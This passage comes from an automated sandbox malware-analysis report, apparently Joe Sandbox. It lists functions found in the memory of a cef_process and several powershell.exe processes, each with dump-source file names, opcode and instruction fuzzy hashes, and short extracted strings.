Instruction ID: c52c546f3a8d6cbc1ffa6107c32d500c15bae79fa1c3d2dadaafb16e60331665
Opcode Fuzzy Hash: d2f4cb909e665083e400ec4b78301ee3b73eb7436f057f3d22606a7f87bdcaba
Instruction Fuzzy Hash: D4F08270B08D488FE7D8DB28851963D36D2EF59241B5405BE948ED32A6CE29DC414781

Function 00007FFAACC974A3 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction ID: c3ec923c845dac6d9bf16893d3545e25030aafbdb39fd66301f72297b54c208c
Opcode Fuzzy Hash: d22a8e422b156d5809998a2f26626c4b4fdbf4edca1dfab634183af3fc6a9455
Instruction Fuzzy Hash: 1901CC74A1992DCFDFA9DF08C894BA8B7B1FB69301F1441DA800EE3650DB75AA84CF45

Function 00007FFAACC984E8 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79dbc162256735b64d115db60dc12a59de3102a85a06c624575d651a6ec27334
Instruction ID: 47889b066260e9a71bba71e0a53674814d294c1108a225d77a7a162e3489c806
Opcode Fuzzy Hash: 79dbc162256735b64d115db60dc12a59de3102a85a06c624575d651a6ec27334
Instruction Fuzzy Hash: 6FF0BE1190E887CEFA654F2454262B82A80EF03344F64847AC54E879D2C91EEB1E43D1

Function 00007FFAACC95245 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb78616005b53ba5933f15ec823d510c1d9bf7b8e3bb7679ad31261b85ab07a
Instruction ID: 7963ab5663d5b64608cc3f26b3ccb8a5bb82b6724bfd5f3c86dbc9cb2d4fc757
Opcode Fuzzy Hash: efb78616005b53ba5933f15ec823d510c1d9bf7b8e3bb7679ad31261b85ab07a
Instruction Fuzzy Hash: EFE09A3580EB88CFEB61CF1088560EC7F20BF52300F1842E6D50D06182DB2AAA0C9282

Function 00007FFAACC9DC8B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1621418240.00007FFAACC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACC90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaacc90000_cef_process.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction ID: 99393b259f7bef76a6e70a46048505929a03ed23950cdf56771d5ee7d58ed914
Opcode Fuzzy Hash: 61a40d3cf6e15dab64fccae4e4d47597c5b5d6015f0e832f2ad277dff738981f
Instruction Fuzzy Hash: 1BD09220E0E603C5F2696F4181603396A905F13741F2084BAD05F6A8C5C96EF5096281

Non-executed Functions

Function 00007FFAAC7436FA Relevance: 1.6, Strings: 1, Instructions: 333COMMON

Download Yara Rule

Strings

1_^, xrefs: 00007FFAAC743701

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID:
String ID: 1_^
API String ID: 0-1199027470
Opcode ID: c26549289faf5a992743cc7893fddfe93a75d7ebd3a238b3c29e3dcf7cdc9182
Instruction ID: 90c715f21f70f4d489e21df3423071cb097b45b166b4a230e3e770f461c5637c
Opcode Fuzzy Hash: c26549289faf5a992743cc7893fddfe93a75d7ebd3a238b3c29e3dcf7cdc9182
Instruction Fuzzy Hash: 43C104D292EBC2DBF355476CC94A074BFB1FF1321472881BAD09D86197EE28E90987D1

Function 00007FFAAC73D28D Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1614913483.00007FFAAC730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffaac730000_cef_process.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fdd902f20e0b82ddea79eaf741ec22710b95cc2ab38ab234bde6eeadc6dcfc
Instruction ID: 52bc3c355111153d24292c0f7723d819682602d613b8e71f1370a7793ce5b30f
Opcode Fuzzy Hash: e5fdd902f20e0b82ddea79eaf741ec22710b95cc2ab38ab234bde6eeadc6dcfc
Instruction Fuzzy Hash: 6D31D170D18A1DCFCF88DF98D491AEDBBF1FB69300F20516AD419E7281CA35A945CB84

Analysis Process: powershell.exePID: 7800, Parent PID: 7700COMMON

Executed Functions

Function 00007FFAAC636605 Relevance: 1.7, Strings: 1, Instructions: 436COMMON

Download Yara Rule

Strings

X75], xrefs: 00007FFAAC6367FD

Memory Dump Source

Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd

Similarity

API ID:
String ID: X75]
API String ID: 0-3107120315
Opcode ID: a48d398300cd834a50f0d9afb055e60befd9d8cd7839b9730e36d2cd3b60cd62
Instruction ID: c8931e9736fa68b1f3c654929c7a92be42342c6029d7b9a585e47d4773eb24fa
Opcode Fuzzy Hash: a48d398300cd834a50f0d9afb055e60befd9d8cd7839b9730e36d2cd3b60cd62
Instruction Fuzzy Hash: FFD1456690EACA8FF756D72888199B97FE0FF46250B0451FED44EC71D3DA28D809C391

Function 00007FFAAC569EE0 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a86b02a8ec8f3b6be006b4bc8e2c8b33451c61758d0d758f2bae8e442ddbdc
Instruction ID: 2ebc9551cf511979ed2fa53eaf01fd7b0bbd6635864cedfa4681fd4b67da2a40
Opcode Fuzzy Hash: d4a86b02a8ec8f3b6be006b4bc8e2c8b33451c61758d0d758f2bae8e442ddbdc
Instruction Fuzzy Hash: F3812CA3D4E683CBF712576C98A60F9BF64EF12325B0C40B2E1CD86053FD19A51A97C2

Function 00007FFAAC569738 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94224b2b98247beff5d747501950f0bd26ffed38df78a0e88328eb28f3bd8880
Instruction ID: ffdc628f900e7542f7d8da9fdc8726c1a091010fc96e0e6c04485eea6e0335c2
Opcode Fuzzy Hash: 94224b2b98247beff5d747501950f0bd26ffed38df78a0e88328eb28f3bd8880
Instruction Fuzzy Hash: BD412D7190DB498FEB58AF5CAC066F9BBE1FB96310F04816FE04DC3252DA24E85587C2

Function 00007FFAAC56B6FC Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6687b8dac69fd1a6614a9833e85c3c20f9eb506cb714bbcffd23f0027f7690a3
Instruction ID: 687e1abf91da9734c82d81554fae91fc1c6495366ca21473b0f92fca0266d1a0
Opcode Fuzzy Hash: 6687b8dac69fd1a6614a9833e85c3c20f9eb506cb714bbcffd23f0027f7690a3
Instruction Fuzzy Hash: CB31793190DB888FEB58DBAC9C056E9BBE0EF96320F0441BFD04DC7152C9249849CB82

Function 00007FFAAC44E540 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2561896607.00007FFAAC44D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC44D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac44d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 685c0780432ba9924086eecb3106dab95174667dd86d87fffcd1caf7681602b3
Instruction ID: 57ba327d8d86d61847103d81a493d3096c817daf151760e7013e83822ab92b52
Opcode Fuzzy Hash: 685c0780432ba9924086eecb3106dab95174667dd86d87fffcd1caf7681602b3
Instruction Fuzzy Hash: 3041247140EBC48FE7568B38D8459523FF0EF53224B2905EFD089CB1A3D625E84AC796

Function 00007FFAAC5633B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 23306aa872b8654059e46dc98aba13863009447ff91d1f8f1bd030fded881b3a
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 0801677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DA36E882CB45

Function 00007FFAAC63414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e8724fa325c6878d37ead8a7f74c661d74a19561c2a2471a6c18e8e2e16ff0
Instruction ID: b6fdf222943b888091f6f502e5eca47870960adda5bf37e8f5659c8428fd090a
Opcode Fuzzy Hash: 62e8724fa325c6878d37ead8a7f74c661d74a19561c2a2471a6c18e8e2e16ff0
Instruction Fuzzy Hash: 55F0BE32A0D9448FE759EB5CE4458B8BBE0EF5532071190FAE05DC76A3CE25EC45C780

Function 00007FFAAC634400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f558fe848ba76e8d065c1ebceaff1d4cd8b12b6090f75141189ff63345f6ea61
Instruction ID: ca4c1692bbec655d2f459058a6f84a385e460deb83dc23067fbe2c099781ad55
Opcode Fuzzy Hash: f558fe848ba76e8d065c1ebceaff1d4cd8b12b6090f75141189ff63345f6ea61
Instruction Fuzzy Hash: D0F0E232A0D5848FE755EB1CE4458A8BBE0FF05320B5190F6E04DC7563DE25EC54C790

Function 00007FFAAC6341D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2577759140.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac630000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 3b624ada25fce03167e5eebe06f4551e21686fbd26d2eb1f1923758689c3ff89
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: F8E01A31B0C808CFEAA9DB0CE0409B9B7E1EB9932171161B7D14EC7661CA22EC559BC0

Non-executed Functions

Function 00007FFAAC5683F3 Relevance: 5.3, Strings: 4, Instructions: 289COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFAAC568562
N_^, xrefs: 00007FFAAC568522
N_^, xrefs: 00007FFAAC5685C2
N_^, xrefs: 00007FFAAC5684C2

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 39f7a8b0d574857e5aedf2c17ebef44c4d85df572d9433501568e9199242ab80
Instruction ID: 637ae9e2cb6a99cf7bc6f1e3da3d3e90c004aebac2f2431168dac58c2cbc9f42
Opcode Fuzzy Hash: 39f7a8b0d574857e5aedf2c17ebef44c4d85df572d9433501568e9199242ab80
Instruction Fuzzy Hash: 1B916187E4E7C39AF75A032C58760B4AFD49F6321971D41F6E1CC4B093DB58A44E8391

Function 00007FFAAC568995 Relevance: 5.2, Strings: 4, Instructions: 169COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFAAC568A6A
N_^, xrefs: 00007FFAAC5689C9
N_^, xrefs: 00007FFAAC568A2A
N_^, xrefs: 00007FFAAC568AC2

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: e92157bcb0ec907eb05547fe0827964611eac4710ffc337572c0633da5e67083
Instruction ID: 8f998b094cfcb03cbfcdb8f6aeb047906cdf4ea734171ee36c95a294e9e799d2
Opcode Fuzzy Hash: e92157bcb0ec907eb05547fe0827964611eac4710ffc337572c0633da5e67083
Instruction Fuzzy Hash: 575196A294F7C38BF35A436858651E5BFE4EF13324B0D41F6E58D8B093EE19A44A4382

Function 00007FFAAC568BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

N_^J, xrefs: 00007FFAAC568C8A
N_^4, xrefs: 00007FFAAC568BFA
N_^F, xrefs: 00007FFAAC568C7A
N_^7, xrefs: 00007FFAAC568C12

Memory Dump Source

Source File: 00000009.00000002.2569130407.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffaac560000_powershell.jbxd

Similarity

API ID:
String ID: N_^4$N_^7$N_^F$N_^J
API String ID: 0-3508309026
Opcode ID: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction ID: 25d616254ea908bae9976e55c3b59c31fd8d590baadc242b8ce4c8a183402ff0
Opcode Fuzzy Hash: 2f5b78e997f032b4b8a1963d1e0a1c1ccde872ad4d7bd0ddebff894856409483
Instruction Fuzzy Hash: 102104B7A080254FD3017BBCEC24DE93B50DB9823474942B2D299CB253ED1471CA8EC2

Analysis Process: powershell.exePID: 7808, Parent PID: 7700COMMON

Executed Functions

Function 00007FFAAC656605 Relevance: 1.7, Strings: 1, Instructions: 449COMMON

Download Yara Rule

Strings

X7<[, xrefs: 00007FFAAC6567FD

Memory Dump Source

Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID: X7<[
API String ID: 0-2173958855
Opcode ID: e520f241e47f38420d2bf8fcc01d63ad2a7e1f68a098a33a2576304261e76416
Instruction ID: 453e07a5961a6a4dd917e7b03ac04bb3d0ce3b8a9770d50fbce80a2456b011d1
Opcode Fuzzy Hash: e520f241e47f38420d2bf8fcc01d63ad2a7e1f68a098a33a2576304261e76416
Instruction Fuzzy Hash: 98D1576690EB8E8FF756D72888555B97FA0EF46310B2851FEE04DC71D3DA28D809C391

Function 00007FFAAC58B238 Relevance: .5, Instructions: 468COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ef85b35aeb583491f99ada6bb68291d4de9e05818a99f019ae6eec6fbbca7da
Instruction ID: e3d2c55c672d8c6a39a278c574a9752834f0b0e0016bc06fedefac6860044945
Opcode Fuzzy Hash: 9ef85b35aeb583491f99ada6bb68291d4de9e05818a99f019ae6eec6fbbca7da
Instruction Fuzzy Hash: 3CD14970A1CB498FE749EB2CC8856B57BE5EF56311F10417EE08EC32A7DA25E846C781

Function 00007FFAAC589EE0 Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d25e4f59225c2cc6734ff1647aa42c7072398951852f5eb5c7b0ccfb4274c1e
Instruction ID: c697aaa7d515f160561b30dff4e694fb339e79cffa0248e93ac6e92887dd267d
Opcode Fuzzy Hash: 1d25e4f59225c2cc6734ff1647aa42c7072398951852f5eb5c7b0ccfb4274c1e
Instruction Fuzzy Hash: C9811DA3D4EB83CBF706976C98661F93BA4EF52315F088076E08D46053FD19A61E5BC2

Function 00007FFAAC589738 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fca0548d65b6e2e20e819c18d78b389152ab1364f2a045569f3c43f6b423af65
Instruction ID: 96e96dc557143a6cb3cf3f6467092d88941b5a91206e9f7f70b3e1528cee9d24
Opcode Fuzzy Hash: fca0548d65b6e2e20e819c18d78b389152ab1364f2a045569f3c43f6b423af65
Instruction Fuzzy Hash: 83412B7190CB499FEB58AF5CAC466F87BE1FB95310F04816FE04DD3252DA20A9558BC2

Function 00007FFAAC46EF00 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2537064463.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac46d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c4e1c2ab070f49e3c27c91de57f35e0c06e5f42ab6192bef644726036bdbfd0
Instruction ID: e363e584a9ac8fbe255642b6b9feeae14739434bda26b2e5f80bddd9abd7b7e7
Opcode Fuzzy Hash: 9c4e1c2ab070f49e3c27c91de57f35e0c06e5f42ab6192bef644726036bdbfd0
Instruction Fuzzy Hash: C4413B7140EBC49FE75A8B289855A527FF0EF53314B1901DFE088CB197D625E80AC7D2

Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
Opcode Fuzzy Hash: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction Fuzzy Hash: F301677115CB0D8FD744EF0CE451AB5B7E0FB95364F10056DE58AC3661DA36E882CB45

Function 00007FFAAC65414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction ID: 385ec90054a036e6d5f2a5a70f95f0abaf044e9a75f89d9ec4f173268e8e308b
Opcode Fuzzy Hash: 51f5b6043e0f82a35d0669c7f88ae01ab06a18875b261606dbeffe2eef191ee6
Instruction Fuzzy Hash: 28F09A32A4D5088FE769EB5CE4458A877E0EF55320B2190FAE05DC75A3CE25EC45C780

Function 00007FFAAC654400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction ID: 67b1750df67e56bcfd51a0679768562f7229a144de909be0f45c4c9286d202a8
Opcode Fuzzy Hash: e18fa7b76d0c06402f587efd2377e5a20668f99f011e42b50fea2fee2c6266bb
Instruction Fuzzy Hash: 5EF0E232A8D5488FE759EB1CE0458A877E0FF05320B6190FAE04DCB463DE25EC44C790

Function 00007FFAAC6541D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2556204527.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: 73551cc810c09e82e539eb5e1c4e7a3fbd698574b07bad01e3e611af36010216
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: DBE01A31B4C808CFEA79DB0CE0409B973E1EB99321B2161BBD14EC7561CA22EC559BC0

Non-executed Functions

Function 00007FFAAC588BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

L_^J, xrefs: 00007FFAAC588C8A
L_^7, xrefs: 00007FFAAC588C12
L_^4, xrefs: 00007FFAAC588BFA
L_^F, xrefs: 00007FFAAC588C7A

Memory Dump Source

Source File: 0000000A.00000002.2547651379.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID: L_^4$L_^7$L_^F$L_^J
API String ID: 0-3225005683
Opcode ID: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction ID: 4176c8602b69aee7968f290b64ec331f5eed73d9827c1be3728d877b46de185e
Opcode Fuzzy Hash: 02d8dffb2fc30e881c9c0a44405cd32b71f90e60e1d62c3e6a1fe4010585dcda
Instruction Fuzzy Hash: 952101B76080264ED2027BBDB815DFD3760CB9823434592B2D299CB223EE1470CA8EE0

Analysis Process: powershell.exePID: 7824, Parent PID: 7700COMMON

Executed Functions

Function 00007FFAAC656605 Relevance: .4, Instructions: 439COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2511201831.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac650000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e66f174cfd4400889413e0893f6a437686c3f35a286802ca514a11e550cb1791
Instruction ID: 672a81dd05e60970a447c99ac9e08954f4389cbcc3011677dd83fb658686d3dc
Opcode Fuzzy Hash: e66f174cfd4400889413e0893f6a437686c3f35a286802ca514a11e550cb1791
Instruction Fuzzy Hash: F2D1476590EB8E8FF756D72888159B97FA0EF46310B2851FEE44DC71D3DA28D809C391

Function 00007FFAAC58B6FC Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328c96d442a3427cc9f4215e5de9d44985796036afc82a2185cde1c3c60e7841
Instruction ID: 705528d7f254268cebc38c80d6a452d9a12ee14f0bf3a5ca182a4792192f3e39
Opcode Fuzzy Hash: 328c96d442a3427cc9f4215e5de9d44985796036afc82a2185cde1c3c60e7841
Instruction Fuzzy Hash: 0981496290EBC7CFF75687684C560F53FA8EF13320F0841BBE089C70A3D919990A9B91

Function 00007FFAAC589FFB Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e7531b094db824a796950e68c3beeb7f0b665864683b140d8b1f9e1cd5d295
Instruction ID: d2522406e144e4d2b9182b796f29b80816f11c9f22e6ea2c7eb19c3c507ee8e8
Opcode Fuzzy Hash: 87e7531b094db824a796950e68c3beeb7f0b665864683b140d8b1f9e1cd5d295
Instruction Fuzzy Hash: 6B6104A7D8EB83CAF606575898561F93BA4EF23355F088072E08D96083ED19A71E57C2

Function 00007FFAAC589728 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa56285568754817ee19b9fcba9ce81376ade9a897c0f1be39ef662928faac6a
Instruction ID: 6d1da34fa7ae3d94e05e51c09b8c4fd51db580c274fafde19e80a8814a6f0275
Opcode Fuzzy Hash: aa56285568754817ee19b9fcba9ce81376ade9a897c0f1be39ef662928faac6a
Instruction Fuzzy Hash: 49412D7190CB898FEB189B5CA8066B87FE1FB95311F04816FE04DD3292DA20E959C7C2

Function 00007FFAAC46EE20 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2483231262.00007FFAAC46D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC46D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac46d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f91d47dc6cc26aff27553a5af96917bba271ba45a5081721253402be6f89d78
Instruction ID: fbe905b5eeaf4710055d23ce245f2a86ac0990272d1d80a288360a6fd3bf7de0
Opcode Fuzzy Hash: 9f91d47dc6cc26aff27553a5af96917bba271ba45a5081721253402be6f89d78
Instruction Fuzzy Hash: 8B41037140EBC49FE7568B28D8559523FF0EF53324B1905EFE088CB1A7D625E84AC7A2

Function 00007FFAAC5833B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2501516430.00007FFAAC580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffaac580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749563f419819850808ac2b7323902100547ee51120455f12beae56beba39b1f
Instruction ID: 1ce3309a3258698c77acd1a934b1dd5e9fd8776a9a3446389a18c2b90e62ff75
